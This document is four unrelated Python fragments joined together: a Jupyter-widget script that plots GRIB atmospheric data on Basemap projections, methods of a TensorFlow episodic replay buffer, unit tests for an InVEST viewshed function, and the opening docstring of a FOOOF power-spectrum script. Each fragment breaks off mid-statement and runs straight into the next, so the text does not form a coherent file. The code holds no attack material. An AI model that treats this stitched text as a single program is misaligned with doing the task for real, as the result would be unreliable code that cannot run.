options=dict_projection_map,
description='Map Location',
)
button = widgets.Button(description='Validate')
out = widgets.Output()
display(projection_widget)
display(button)
display(out)
def click_projection_map(b):
with out:
clear_output(wait=True)
get_color_map(output_dir, output_filename, projection_widget.value)
button.on_click(click_projection_map)
def get_color_map(output_dir, output_filename, projection):
""" This function allows to display the Matplotlib colormap possibilities and gives the right to the user to define
what kind of colormap and direction way he wants to display data.
Parameters
----------
output_dir: string
folder where output.grib and img are stored.
output_filename : string
output.grib location
projection : string
the continent where data will be displayed
"""
# displaying colormaps sample:
gradient = np.linspace(0, 1, 256)
gradient = np.vstack((gradient, gradient))
fig, axes = plt.subplots(nrows=len(dict_color_map))
fig.subplots_adjust(top=0.95, bottom=0.01, left=0.2, right=0.99)
axes[0].set_title('Colormaps sample', fontsize=14)
for ax, name in zip(axes, dict_color_map):
ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(name))
pos = list(ax.get_position().bounds)
x_text = pos[0] - 0.01
y_text = pos[1] + pos[3] / 2.
fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)
# Turn off *all* ticks & spines, not just the ones with colormaps.
for ax in axes:
ax.set_axis_off()
plt.show()
# defining colormap user choice:
color_map_widget = widgets.Dropdown(
options=dict_color_map,
description='Map colors',
value="gist_ncar"
)
color_display_direction_widget = widgets.Dropdown(
options=color_display_direction,
description='Display direction',
)
image_title_widget = widgets.Text(
value='',
placeholder='Enter your title',
description='Title',
disabled=False
)
gif_filename_widget = widgets.Text(
value='',
placeholder='Enter the GIF file name',
description='GIF file name',
disabled=False
)
button = widgets.Button(description='Validate')
out = widgets.Output()
display(color_map_widget)
display(color_display_direction_widget)
display(image_title_widget)
display(gif_filename_widget)
display(button)
display(out)
def click_color_map(b):
with out:
color_map = color_map_widget.value
if color_display_direction_widget.value == color_display_direction[1]:
color_map = color_map + "_r"
if (image_title_widget.value == '') and (gif_filename_widget.value == ''):
gif_filename_widget.value = "your_gif_file"
elif (gif_filename_widget.value == ''):
gif_filename_widget.value = image_title_widget.value
print("Images download is starting !")
clear_output(wait=True)
download_images(output_filename, output_dir, projection, color_map, image_title_widget.value,
gif_filename_widget.value)
button.on_click(click_color_map)
def download_images(output_filename, output_dir, projection, color_map, image_title, gif_filename):
""" This function allows to download the data in the output.grib file and build each image
Parameters
----------
output_dir: string
folder where output.grib and img are stored.
output_filename : string
output.grib location
projection : string
the continent where data will be displayed
color_map : string
the color range selected to display data
image_title : string
the title displayed on each image
gif_filename : string
the name of the gif file
"""
# open a GRIB file
with pygrib.open(output_filename) as grbs:
grb = grbs.select()[0]
vmax = np.amax(grb.values)
unit = grb['units']
# get the longitudes and the latitudes
latitudes, longitudes = grb.latlons()
# Emptying the folder which contains precedent img
if not os.path.exists("/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/"):
os.makedirs("/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/")
files = glob.glob(f'{"/home/jovyan/work/cams_data/cams_ecmwfapi/images_data/"}[!output.grib]*')
for f in files:
os.remove(f)
cpt = 1
# create and save a figure for each grib message
for grb in grbs.select():
figure(num=None, figsize=(16, 10))
# create a map
map_ = get_basemap(projection, grb)
map_.drawcoastlines()
map_.drawcountries()
x, y = map_(longitudes, latitudes)
data = grb.values
# display the data
cs = map_.pcolormesh(x, y, data, cmap=plt.get_cmap(color_map), vmin=0, vmax=vmax)
map_.colorbar(cs, label=unit)
plt.title(str(image_title) + f' / {grb["parameterName"]} / date: {grb["dataDate"]} / hour: {grb["hour"]}',
loc='left')
plt.savefig(path.join(output_dir, f'{grb.messagenumber}'))
plt.close()
print("\r #Image - " + str(cpt) + "/" + str(np.size(grbs.select())) + " downloaded")
cpt += 1
clear_output(wait=True)
print("Your img have been successfully downloaded !")
display_GIF_images(output_dir, gif_filename)
def get_basemap(projection, grb):
""" This function returns the Basemap corresponding to the projection map selected in the GUI.
Parameters
----------
projection : string
the continent where data will be displayed
Returns
-------
map_:
the Basemap builds to display data
"""
# get the longitudes and the latitudes
latitudes, longitudes = grb.latlons()
if projection == "WORLD":
map_ = Basemap(projection='cyl', lat_ts=10, llcrnrlon=longitudes.min(),
urcrnrlon=longitudes.max(), llcrnrlat=latitudes.min(), urcrnrlat=latitudes.max(), resolution='l')
elif projection == "AFRICA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=-45., lat_2=36, lat_0=0,
lon_0=22.)
elif projection == "SOUTH-AMERICA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=-55., lat_2=12,
lat_0=-26, lon_0=-60.)
elif projection == "ASIA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=10., lat_2=70, lat_0=45,
lon_0=100.)
elif projection == "EUROPE":
map_ = Basemap(width=8000000, height=7000000, resolution='l', projection='eqdc', lat_1=40., lat_2=60, lon_0=35,
lat_0=50)
elif projection == "NORTH-AMERICA":
map_ = Basemap(width=12000000, height=9000000, resolution='l', projection='eqdc', lat_1=45., lat_2=55, lat_0=50,
lon_0=-107.)
elif | |
`extend_episodes`; those methods will return an updated set of episode id
values in their output. To keep track of updated episode IDs across
multiple TF1 session run calls, the `episode_ids` may be read out and passed
back in by the user, or stored in a `tf.Variable`. A helper class which
does this for you is available in this module, it is called
`StatefulEpisodicReplayBuffer`.
A simple non-`Variable` way to do this (in TF1) is:
```python
data = collect_data_tf_op()
episode_ids = tf.placeholder_with_default(rb.create_episode_ids(3), [3])
new_episode_ids = rb.add_batch(data, episode_ids)
ids = session.run(episode_ids)
while True:
...
ids = session.run(new_episode_ids, feed_dict=dict(episode_ids=ids))
```
The initial value of these ids is subject to change, but currently set
to `-1`. When methods like `add_batch` see entries like this, they
reserve a new (valid) id for this entry in the buffer and return the
associated id in this location.
Args:
num_episodes: (Optional) int32, number of episode IDs to create.
This may be a tensor. If `None`, a scalar ID tensor is returned.
Returns:
An int64 Tensor containing initial episode(s) ID(s).
Raises:
ValueError: If `num_episodes` is bigger than capacity, or non-scalar.
"""
if tf.is_tensor(num_episodes):
if num_episodes.shape.rank != 0:
raise ValueError('num_episodes must be a scalar, but saw shape: {}'
.format(num_episodes.shape))
return tf.fill(
[num_episodes],
tf.convert_to_tensor(_INVALID_EPISODE_ID, dtype=tf.int64),
name='episode_id')
shape = ()
if num_episodes is not None and num_episodes > 0:
if num_episodes > self._capacity:
raise ValueError('Buffer cannot create episode_ids when '
'num_episodes {} > capacity {}.'.format(
num_episodes, self._capacity))
shape = (num_episodes,)
return tf.constant(
_INVALID_EPISODE_ID, shape=shape, dtype=tf.int64, name='episode_id')
def add_sequence(self, items, episode_id):
"""Adds a sequence of items to the replay buffer for the selected episode.
Args:
items: A sequence of items to be added to the buffer. Items will have the
same structure as the data_spec of this class, but the tensors in items
will have an outer sequence dimension in addition to the corresponding
spec in data_spec.
episode_id: A Tensor containing the current episode_id.
Returns:
An updated episode id Tensor. Accessing this episode id value will,
as a side effect, start or end the current episode in the buffer.
"""
episode_id.shape.assert_has_rank(0)
with tf.device(self._device):
with tf.name_scope('add_steps'):
# If users pass in, e.g., a python list [2, 3, 4] of type int32
# but the data_spec requires an int64, then the user will get a very
# confusing error much deeper in the TensorList code. Doing the
# conversion here either converts when necessary, or raises an error
# on incompatible types earlier in the run.
items = tf.nest.map_structure(
lambda x, spec: tf.convert_to_tensor(value=x, dtype=spec.dtype),
items, self._data_spec)
item_0 = tf.nest.flatten(items)[0]
num_steps = tf.cast(
tf.compat.dimension_value(item_0.shape[0]) or
tf.shape(input=item_0)[0], tf.int64)
# If begin_episode is True, then the increment of the episode_id happens
# before trying to add anything to the buffer, regardless of whether the
# item will actually be added.
begin_episode = self._begin_episode_fn(items)
end_episode = self._end_episode_fn(items)
new_episode_id = self._get_episode_id(
episode_id, begin_episode, end_episode)
episode_location = self._get_episode_id_location(new_episode_id)
def _add_steps():
"""Add sequence of items to the buffer."""
inc_episode_length = self._increment_episode_length_locked(
episode_location, num_steps)
write_data_op = self._data_table.append(episode_location, items)
with tf.control_dependencies([inc_episode_length, write_data_op]):
return tf.identity(new_episode_id)
# Accessing episode_id may modify
# self._episodes_loc_to_id_map, so ensure it is executed
# before the tf.equal.
with tf.control_dependencies([new_episode_id]):
episode_valid = tf.equal(
self._episodes_loc_to_id_map[episode_location], new_episode_id)
def _maybe_add_steps():
return self._add_episode_critical_section.execute(_add_steps)
return utils.smart_cond(
episode_valid,
_maybe_add_steps,
lambda: tf.identity(new_episode_id),
name='conditioned_add_steps')
def add_batch(self, items, episode_ids):
"""Adds a batch of single steps for the corresponding episodes IDs.
Args:
items: A batch of items to be added to the buffer. Items will have the
same structure as the data_spec of this class, but the tensors in items
will have an extra outer dimension `(num_episodes, ...)` in addition to
the corresponding spec in data_spec.
episode_ids: A int64 vector `Tensor` containing the ids of the
episodes the items are being added to. Shaped `(num_episodes,)`.
Returns:
A `Tensor` containing the updated episode ids. Accessing or executing
this tensor also adds `items` to the replay buffer.
"""
episode_ids.shape.assert_has_rank(1)
with tf.device(self._device):
with tf.name_scope('add_batch'):
# If begin_episode is True, then the increment of the episode_id happens
# before trying to add anything to the buffer, regardless of whether the
# item will actually be added.
begin_episode = self._begin_episode_fn(items)
end_episode = self._end_episode_fn(items)
batch_episode_ids = self._get_batch_episode_ids(episode_ids,
begin_episode,
end_episode)
episodes_locations = tf.math.mod(batch_episode_ids, self._capacity)
# Accessing episode_id may modify self._episodes_loc_to_id_map, so
# ensure it is executed before
with tf.control_dependencies([episodes_locations]):
episode_valid = tf.equal(
self._episodes_loc_to_id_map.sparse_read(episodes_locations),
batch_episode_ids)
def _add_batch():
"""Add elements to the appropiate episode_locations."""
ids_to_update = tf.reshape(tf.compat.v1.where(episode_valid), [-1])
episodes_locations_ = tf.gather(episodes_locations, ids_to_update)
filter_items = lambda item: tf.gather(item, ids_to_update)
items_ = tf.nest.map_structure(filter_items, items)
write_data_op = self._data_table.add(episodes_locations_, items_)
inc_episode_lengths = self._increment_episode_length_locked(
episodes_locations_)
inc_write_counter_op = self._num_writes.assign_add(1)
with tf.control_dependencies([
write_data_op, inc_episode_lengths, inc_write_counter_op]):
return tf.identity(batch_episode_ids)
num_adds = tf.reduce_sum(input_tensor=tf.cast(episode_valid, tf.int64))
def _maybe_add_batch():
return self._add_episode_critical_section.execute(_add_batch)
return tf.cond(
pred=num_adds > 0,
true_fn=_maybe_add_batch,
false_fn=lambda: episode_ids)
def gather_all(self):
"""Returns all the items in buffer.
Returns:
Returns all the items currently in the buffer. Returns a tensor
of shape [1, SUM(T_i), ...]. Since episodes can be of different lengths,
all steps of all episodes are grouped into one batch. Thus the first
dimension is batch size = 1, the second dimension is of size equal to
the sum of all timesteps for all episodes (SUM(T_i) for i in episode_ids).
The remaining dimensions are the shape of the spec of items in the buffer.
"""
items, _ = self._gather_all()
return items
# Defining abstract methods from replay_buffers.ReplayBuffer
def _add_batch(self, items):
raise NotImplementedError("""add_batch(items) is not implemented in
EpisodicReplayBuffer. Use add_batch(items, episode_ids) instead""")
def _get_next(self,
sample_batch_size=None,
num_steps=None,
time_stacked=None):
"""Returns an episode sampled uniformly from the buffer.
Args:
sample_batch_size: Not used
num_steps: Not used
time_stacked: Not used
Returns:
A 2-tuple containing:
- An episode sampled uniformly from the buffer.
- BufferInfo NamedTuple, containing the episode id.
"""
with tf.device(self._device):
with tf.name_scope('get_next'):
episode_id = self._sample_episode_ids(shape=[], seed=self._seed)
row = self._get_episode_id_location(episode_id)
data = self._data_table.get_episode_values(row)
id_ = self._id_table.read(row)
return data, BufferInfo(ids=id_)
def _as_dataset(self,
sample_batch_size=None,
num_steps=None,
sequence_preprocess_fn=None,
num_parallel_calls=tf.data.experimental.AUTOTUNE):
"""Creates a dataset that returns episodes entries from the buffer.
The dataset behaves differently depending on if `num_steps` is provided or
not. If `num_steps = None`, then entire episodes are sampled uniformly at
random from the buffer. If `num_steps != None`, then we attempt to sample
uniformly across frames of all the episodes, and return subsets of length
`num_steps`. The algorithm for this is roughly:
1. Sample an episode with a probability proportional to its length.
2. If the length of the episode is less than `num_steps`, drop it.
3. Sample a starting location `start` in `[0, len(episode) - num_steps]`
4. Take a slice `[start, start + num_steps]`.
The larger `num_steps` is, the higher the likelihood of edge effects (e.g.,
certain frames not being visited often because they are near the start
or end of an episode). In the worst case, if `num_steps` is greater than
most episode lengths, those episodes will never be visited.
Args:
sample_batch_size: (Optional.) An optional batch_size to specify the
number of items to return. See as_dataset() documentation.
num_steps: (Optional.) Scalar int. How many contiguous frames to get
per entry. Default is `None`: return full-length episodes.
sequence_preprocess_fn: (Optional.) Preprocessing function for sequences
before they are sharded into subsequences of length `num_steps` and
batched.
num_parallel_calls: Number of parallel calls to use in the
dataset pipeline when extracting episodes. Default is to have
tensorflow determine the optimal number of calls.
Returns:
A dataset of type tf.data.Dataset, elements of which are 2-tuples of:
- An item or sequence of items sampled uniformly from the buffer.
- BufferInfo NamedTuple, containing the episode id.
Raises:
ValueError: If the data spec contains lists that must be converted to
tuples.
NotImplementedError: If `sequence_preprocess_fn != None` is passed in.
"""
if sequence_preprocess_fn is not None:
raise NotImplementedError('sequence_preprocess_fn is not supported.')
# data_tf.nest.flatten does not flatten python lists, tf.nest.flatten does.
if tf.nest.flatten(self._data_spec) != data_nest.flatten(self._data_spec):
raise ValueError(
'Cannot perform gather; data spec contains lists and this conflicts '
'with gathering operator. Convert any lists to tuples. '
'For example, if your spec looks like [a, b, c], '
'change it | |
= (5, 5)
max_dist = 4
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
viewshed((dem_filepath, 1), viewpoint, visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'),
refraction_coeff=1.0, max_distance=max_dist)
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
expected_visibility = numpy.zeros(matrix.shape)
expected_visibility = numpy.array(
[[255, 255, 255, 255, 255, 255],
[255, 255, 255, 255, 255, 0],
[255, 255, 255, 1, 1, 1],
[255, 255, 1, 1, 1, 1],
[255, 255, 1, 1, 1, 1],
[255, 0, 1, 1, 1, 1]], dtype=numpy.uint8)
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_refractivity(self):
"""SQ Viewshed: refractivity partly compensates for earth's curvature."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.array([[2, 1, 1, 2, 1, 1, 1, 1, 1, 50]])
viewpoint = (0, 0)
matrix[viewpoint] = 2
matrix[0, 3] = 2
pixel_size = (1000, -1000)
# pixels are 1km. With the viewpoint at an elevation of 1m,
# the horizon should be about 3.6km out. A 50m structure 10km out
# should be visible above the horizon.
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
ViewshedTests.create_dem(matrix, dem_filepath,
pixel_size=pixel_size)
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
viewshed((dem_filepath, 1), viewpoint, visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'),
refraction_coeff=0.1)
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
# Because of refractivity calculations (and the size of the pixels),
# the pixels farther to the right are visible despite being 'hidden'
# behind the hill at (0,3). This is due to refractivity.
expected_visibility = numpy.array(
[[1, 1, 1, 1, 0, 0, 0, 0, 0, 1]], dtype=numpy.uint8)
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_intervening_nodata(self):
"""SQ Viewshed: intervening nodata does not affect visibility."""
from natcap.invest.scenic_quality.viewshed import viewshed
nodata = 255
matrix = numpy.array([[2, 2, nodata, 3]])
viewpoint = (0, 0)
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
ViewshedTests.create_dem(matrix, dem_filepath,
nodata=nodata)
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
viewshed((dem_filepath, 1), viewpoint, visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'),
refraction_coeff=0.0)
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
expected_visibility = numpy.array(
[[1, 1, 0, 1]], dtype=numpy.uint8)
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_nodata_undefined(self):
"""SQ Viewshed: assume a reasonable nodata value if none defined."""
from natcap.invest.scenic_quality.viewshed import viewshed
nodata = None # viewshed assumes an unlikely nodata value.
matrix = numpy.array([[2, 2, 1, 3]])
viewpoint = (0, 0)
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
ViewshedTests.create_dem(matrix, dem_filepath,
nodata=nodata)
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
viewshed((dem_filepath, 1), viewpoint, visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'),
refraction_coeff=0.0)
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
expected_visibility = numpy.array(
[[1, 1, 0, 1]], dtype=numpy.uint8)
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_block_size_check(self):
"""SQ Viewshed: exception raised when blocks not equal, power of 2."""
from natcap.invest.scenic_quality.viewshed import viewshed
srs = osr.SpatialReference()
srs.ImportFromEPSG(4326)
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
pygeoprocessing.testing.create_raster_on_disk(
[numpy.ones((10, 10))], (0, 0), projection_wkt=srs.ExportToWkt(),
nodata=-1, pixel_size=(1, -1),
raster_driver_creation_tuple=(
'GTIFF', ('TILED=NO', 'BIGTIFF=YES', 'COMPRESS=LZW',
'BLOCKXSIZE=20', 'BLOCKYSIZE=40')),
filename=dem_filepath)
with self.assertRaises(ValueError):
viewshed(
(dem_filepath, 1), (0, 0), visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
def test_view_from_valley(self):
"""SQ Viewshed: test visibility from within a pit."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.zeros((9, 9))
matrix[5:8, 5:8] = 2
matrix[4:7, 4:7] = 1
matrix[5, 5] = 0
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed((dem_filepath, 1), (5, 5), visibility_filepath,
refraction_coeff=1.0,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'))
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
expected_visibility = numpy.zeros(visibility_matrix.shape)
expected_visibility[matrix != 0] = 1
expected_visibility[5, 5] = 1
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_tower_view_from_valley(self):
"""SQ Viewshed: test visibility from a 'tower' within a pit."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.zeros((9, 9))
matrix[5:8, 5:8] = 2
matrix[4:7, 4:7] = 1
matrix[5, 5] = 0
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed((dem_filepath, 1), (5, 5), visibility_filepath,
viewpoint_height=10,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'))
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
expected_visibility = numpy.ones(visibility_matrix.shape)
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_primitive_peak(self):
"""SQ Viewshed: looking down from a peak renders everything visible."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.zeros((8, 8))
matrix[4:7, 4:7] = 1
matrix[5, 5] = 2
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed((dem_filepath, 1), (5, 5), visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir,
'auxiliary.tif'),
refraction_coeff=1.0)
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
numpy.testing.assert_equal(visibility_matrix, numpy.ones(matrix.shape))
def test_cliff_bottom_half_visibility(self):
"""SQ Viewshed: visibility for a cliff on bottom half of DEM."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.empty((20, 20))
matrix.fill(2)
matrix[7:] = 10 # cliff at row 7
viewpoint = (5, 10)
matrix[viewpoint] = 5 # viewpoint
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed(
dem_raster_path_band=(dem_filepath, 1),
viewpoint=(viewpoint[1], viewpoint[0]),
visibility_filepath=visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
expected_visibility = numpy.ones(matrix.shape)
expected_visibility[8:] = 0
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_cliff_top_half_visibility(self):
"""SQ Viewshed: visibility for a cliff on top half of DEM."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.empty((20, 20))
matrix.fill(2)
matrix[:8] = 10 # cliff at row 8
viewpoint = (10, 10)
matrix[viewpoint] = 5 # viewpoint
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed(
dem_raster_path_band=(dem_filepath, 1),
viewpoint=viewpoint,
visibility_filepath=visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
expected_visibility = numpy.ones(matrix.shape)
expected_visibility[:7] = 0
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_cliff_left_half_visibility(self):
"""SQ Viewshed: visibility for a cliff on left half of DEM."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.empty((20, 20))
matrix.fill(2)
matrix[:, :8] = 10 # cliff at column 8
viewpoint = (10, 10)
matrix[viewpoint] = 5 # viewpoint
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed(
dem_raster_path_band=(dem_filepath, 1),
viewpoint=viewpoint,
visibility_filepath=visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
expected_visibility = numpy.ones(matrix.shape)
expected_visibility[:, :7] = 0
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_cliff_right_half_visibility(self):
"""SQ Viewshed: visibility for a cliff on right half of DEM."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.empty((20, 20))
matrix.fill(2)
matrix[:, 12:] = 10 # cliff at column 8
viewpoint = (10, 10)
matrix[viewpoint] = 5 # viewpoint
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed(
dem_raster_path_band=(dem_filepath, 1),
viewpoint=viewpoint,
visibility_filepath=visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
expected_visibility = numpy.ones(matrix.shape)
expected_visibility[:, 13:] = 0
visibility_raster = gdal.OpenEx(visibility_filepath, gdal.OF_RASTER)
visibility_band = visibility_raster.GetRasterBand(1)
visibility_matrix = visibility_band.ReadAsArray()
numpy.testing.assert_equal(visibility_matrix, expected_visibility)
def test_pillars(self):
"""SQ Viewshed: put a few pillars in a field, can't see behind them."""
from natcap.invest.scenic_quality.viewshed import viewshed
matrix = numpy.empty((20, 20))
matrix.fill(2)
# Put a couple of pillars in there.
for pillar in (
(2, 5),
(18, 5),
(7, 18)):
matrix[pillar] = 10
viewpoint = (10, 10)
matrix[viewpoint] = 5 # so it stands out in the DEM
dem_filepath = os.path.join(self.workspace_dir, 'dem.tif')
visibility_filepath = os.path.join(self.workspace_dir,
'visibility.tif')
ViewshedTests.create_dem(matrix, dem_filepath)
viewshed(
dem_raster_path_band=(dem_filepath, 1),
viewpoint=viewpoint,
visibility_filepath=visibility_filepath,
aux_filepath=os.path.join(self.workspace_dir, 'auxiliary.tif')
)
expected_visibility = numpy.array(
[[1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Computes broadband power, offset and slope of power spectrum
Based on selected epochs (e.g. ASCIIS) in the list of files a power spectrum
is computed. Based on this power spectrum the broadband power is calculated,
followed by the offset and slope using the FOOOF algorithm.
Reference paper FOOOF: <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, <NAME>, <NAME> (2018) Parameterizing Neural
Power Spectra. bioRxiv, 299859. doi: https://doi.org/10.1101/299859
reference Github: https://fooof-tools.github.io/fooof/index.html
"""
__author__ = '<NAME>'
__contact__ = '<EMAIL>' # or <EMAIL>
__date__ = '2020/09/14' ### Date it was created
__status__ = 'Finished'
####################
# Review History #
####################
# Reviewed and Updated by Eduarda Centeno 20201030
####################
# Libraries #
####################
# Standard imports
import time
import os
import glob
import ast
from datetime import date
# Third party imports
import numpy as np # version 1.19.1
import matplotlib.pyplot as plt # version 3.3.0
import pandas as pd # version 1.1.0
from scipy import signal # version 1.4.1
from fooof import FOOOF # version 0.1.3
# Define Functions ------------------------------------------------------------
def find_paths(main_dir, subject, extension, **kwargs):
""" Flexible way to find files in subdirectories based on keywords
Parameters
----------
main_dir: str
Give the main directory where the subjects' folders are stored
subject: str
Give the name of the subject to be analyzed
extension: str
Give the extension type
**kwargs: str
Give keywords that will be used in the filtering of paths
!Important!
It is possible to use the kwargs 'start' & 'end' (int) OR
'selection' (list or str) for selecting epochs. The 'selection'
list should contain the exact way in which the Tr is written, e.g.
Tr01, or Tr_1, etc.
Examples
-------
Ex.1
find_paths(main_dir='/data/KNW/NO-cohorten/Scans/',
subject='sub-9690',
extension='.asc',
key1='T1',
key2='BNA',
key3='Tr_7')
This example will result in a list with a single path:
['.../T1/BNA/1_100_WITH_200_WITH_246_VE_89.643to102.750_Tr_7.asc']
Ex2.
find_paths(main_dir='/data/KNW/NO-cohorten/Scans/',
subject='sub-9690',
extension='.asc',
key1='T1',
key2='BNA',
start=20,
end=23)
This example will result in a list with several paths:
['.../T1/BNA/1_100_WITH_200_WITH_246_VE_260.037to273.143_Tr_20.asc',
'.../T1/BNA/1_100_WITH_200_WITH_246_VE_273.144to286.250_Tr_21.asc',
'.../T1/BNA/1_100_WITH_200_WITH_246_VE_286.251to299.358_Tr_22.asc',
'.../T1/BNA/1_100_WITH_200_WITH_246_VE_299.358to312.465_Tr_23.asc']
Ex3.
find_paths(main_dir='/data/doorgeefluik/',
subject='mumo_002',
extension='.asc',
key1='OD1',
